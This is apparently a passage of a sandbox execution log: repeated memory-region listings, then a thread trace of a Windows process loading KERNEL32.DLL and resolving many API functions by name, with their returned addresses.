start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 22900 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 22901 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 22902 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 22903 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = 
"" Region: id = 22947 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 22948 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 22949 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 22950 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 22951 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23032 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23033 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23034 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23035 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23036 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23043 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23044 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23045 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001b60000" filename = "" Region: id = 23046 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23047 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23564 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23565 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23566 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23567 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23568 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23575 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23576 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23577 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23578 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23579 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23673 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = 
private name = "private_0x00000000001d0000" filename = "" Region: id = 23674 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23675 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23676 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23677 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23683 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23684 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23685 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23686 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23687 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23872 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23873 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23874 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23875 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23876 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23940 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23941 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 23942 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23943 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 23944 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24009 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24010 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24011 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24012 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24013 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24019 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24020 start_va = 0x1750000 end_va = 0x1b5ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24021 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24022 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24023 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24106 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24107 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24108 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24109 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24110 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24116 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24117 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24118 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24119 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24120 start_va = 
0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24280 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24281 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24282 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24283 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24284 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24285 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24286 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24287 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24288 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24289 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24300 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24301 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24302 
start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24303 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24304 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24305 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24306 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24307 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24308 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24309 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24420 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24421 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24422 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24423 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24424 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = 
"" Region: id = 24425 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24426 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24427 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24428 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24429 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24538 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24539 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24540 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24541 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24542 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24543 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24544 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24545 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001b60000" filename = "" Region: id = 24546 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24547 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24627 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24628 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24629 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24630 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24631 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24642 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24643 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24644 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24645 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24646 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24783 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = 
private name = "private_0x00000000001d0000" filename = "" Region: id = 24784 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24785 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24786 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24787 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24788 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24789 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24790 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24791 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24792 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24935 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24936 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24937 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24938 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24939 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Thread: id = 40 os_tid = 0xc44 [0100.741] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0100.742] 
GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0100.743] 
GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") 
returned 0x76943530 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0100.745] GetProcAddress 
(hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0100.745] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0100.745] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 